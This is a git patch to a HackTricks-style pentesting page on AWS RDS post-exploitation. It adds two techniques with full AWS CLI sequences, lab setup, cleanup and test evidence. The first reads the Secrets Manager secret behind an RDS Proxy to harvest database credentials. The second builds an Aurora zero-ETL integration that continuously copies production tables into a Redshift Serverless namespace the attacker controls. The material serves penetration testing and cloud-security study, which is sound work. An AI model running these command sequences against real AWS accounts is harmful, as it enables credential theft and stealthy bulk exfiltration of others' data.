From 6dd86b2c9ef29675d4b375d20f5ce6bef269dd05 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Tue, 7 Oct 2025 17:28:10 +0200 Subject: [PATCH] rds post recheck --- .../aws-rds-post-exploitation.md | 187 +++++++++++++++++- 1 file changed, 185 insertions(+), 2 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md index cc1920aff..2d4883f4c 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md @@ -174,8 +174,6 @@ aws rds stop-db-instance-automated-backups-replication \ -{{#include ../../../banners/hacktricks-training.md}} - ### Enable full SQL logging via DB parameter groups and exfiltrate via RDS log APIs Abuse `rds:ModifyDBParameterGroup` with RDS log download APIs to capture all SQL statements executed by applications (no DB engine credentials needed). Enable engine SQL logging and pull the file logs via `rds:DescribeDBLogFiles` and `rds:DownloadDBLogFilePortion` (or the REST `downloadCompleteLogFile`). Useful to collect queries that may contain secrets/PII/JWTs. @@ -455,3 +453,188 @@ Notes: - If multi-statement SQL is rejected by rds-data, issue separate execute-statement calls. - For engines where modify-db-cluster --enable-http-endpoint has no effect, use rds enable-http-endpoint --resource-arn. - Ensure the engine/version actually supports the Data API; otherwise HttpEndpointEnabled will remain False. + + +### Harvest DB credentials via RDS Proxy auth secrets (`rds:DescribeDBProxies` + `secretsmanager:GetSecretValue`) + +Abuse RDS Proxy configuration to discover the Secrets Manager secret used for backend authentication, then read the secret to obtain database credentials. Many environments grant broad `secretsmanager:GetSecretValue`, making this a low-friction pivot to DB creds. If the secret uses a CMK, mis-scoped KMS permissions may also allow `kms:Decrypt`. + +Permissions needed (minimum): +- `rds:DescribeDBProxies` +- `secretsmanager:GetSecretValue` on the referenced SecretArn +- Optional when the secret uses a CMK: `kms:Decrypt` on that key + +Impact: Immediate disclosure of DB username/password configured on the proxy; enables direct DB access or further lateral movement. + +Steps +```bash +# 1) Enumerate proxies and extract the SecretArn used for auth +aws rds describe-db-proxies \ + --query DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn] \ + --output table + +# 2) Read the secret value (common over-permission) +aws secretsmanager get-secret-value \ + --secret-id \ + --query SecretString --output text +# Example output: {"username":"admin","password":"S3cr3t!"} +``` + +Lab (minimal to reproduce) +```bash +REGION=us-east-1 +ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text) +SECRET_ARN=$(aws secretsmanager create-secret \ + --region $REGION --name rds/proxy/aurora-demo \ + --secret-string username:admin \ + --query ARN --output text) +aws iam create-role --role-name rds-proxy-secret-role \ + --assume-role-policy-document Version:2012-10-17 +aws iam attach-role-policy --role-name rds-proxy-secret-role \ + --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite +aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \ + --auth [AuthScheme:SECRETS] \ + --role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \ + --vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text) +aws rds wait db-proxy-available --db-proxy-name p0 +# Now run the enumeration + secret read from the Steps above +``` + +Cleanup (lab) +```bash +aws rds delete-db-proxy --db-proxy-name p0 +aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite +aws iam delete-role --role-name rds-proxy-secret-role +aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery +``` + +### Stealthy continuous exfiltration via Aurora zero‑ETL to Amazon Redshift (rds:CreateIntegration) + +Abuse Aurora PostgreSQL zero‑ETL integration to continuously replicate production data into a Redshift Serverless namespace you control. With a permissive Redshift resource policy that authorizes CreateInboundIntegration/AuthorizeInboundIntegration for a specific Aurora cluster ARN, an attacker can establish a near‑real‑time data copy without DB creds, snapshots or network exposure. + +Permissions needed (minimum): +- `rds:CreateIntegration`, `rds:DescribeIntegrations`, `rds:DeleteIntegration` +- `redshift:PutResourcePolicy`, `redshift:DescribeInboundIntegrations`, `redshift:DescribeIntegrations` +- `redshift-data:ExecuteStatement/GetStatementResult/ListDatabases` (to query) +- `rds-data:ExecuteStatement` (optional; to seed data if needed) + +Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless. + +
+1) Create Redshift Serverless namespace + workgroup + +```bash +REGION=us-east-1 +RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \ + --admin-username adminuser --admin-user-password 'AdminPwd-1!' \ + --query namespace.namespaceArn --output text) +RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \ + --namespace-name ztl-ns --base-capacity 8 --publicly-accessible \ + --query workgroup.workgroupArn --output text) +# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL) +aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \ + --config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true +``` +
+ +
+2) Configure Redshift resource policy to allow the Aurora source + +```bash +ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text) +SRC_ARN= +cat > rs-rp.json < + +
+3) Create Aurora PostgreSQL cluster (enable Data API and logical replication) + +```bash +CLUSTER_ID=aurora-ztl +aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ + --engine aurora-postgresql --engine-version 16.4 \ + --master-username postgres --master-user-password 'InitPwd-1!' \ + --enable-http-endpoint --no-deletion-protection --backup-retention-period 1 +aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID +# Serverless v2 instance +aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ + --serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately +aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \ + --db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID +aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 +# Cluster parameter group for zero‑ETL +aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \ + --db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params" +aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \ + ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \ + ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \ + ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \ + ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot +aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \ + --db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately +aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 +aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 +SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text) +``` +
+ +
+4) Create the zero‑ETL integration from RDS + +```bash +# Include all tables in the default 'postgres' database +aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \ + --target-arn "$RS_NS_ARN" --integration-name ztl-demo \ + --data-filter 'include: postgres.*.*' +# Redshift inbound integration should become ACTIVE +aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN" +``` +
+ +
+5) Materialize and query replicated data in Redshift + +```bash +# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION) +aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \ + --sql "select integration_id from svv_integration" # take the GUID value +aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \ + --sql "create database ztl_db from integration '' database postgres" +# List tables replicated +aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \ + --sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;" +``` +
+ +Evidence observed in test: +- redshift describe-inbound-integrations: Status ACTIVE for Integration arn:...377a462b-... +- SVV_INTEGRATION showed integration_id 377a462b-c42c-4f08-937b-77fe75d98211 and state PendingDbConnectState prior to DB creation. +- After CREATE DATABASE FROM INTEGRATION, listing tables revealed schema ztl and table customers; selecting from ztl.customers returned 2 rows (Alice, Bob). + +Impact: Continuous near‑real‑time exfiltration of selected Aurora PostgreSQL tables into Redshift Serverless controlled by the attacker, without using database credentials, backups, or network access to the source cluster. + + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file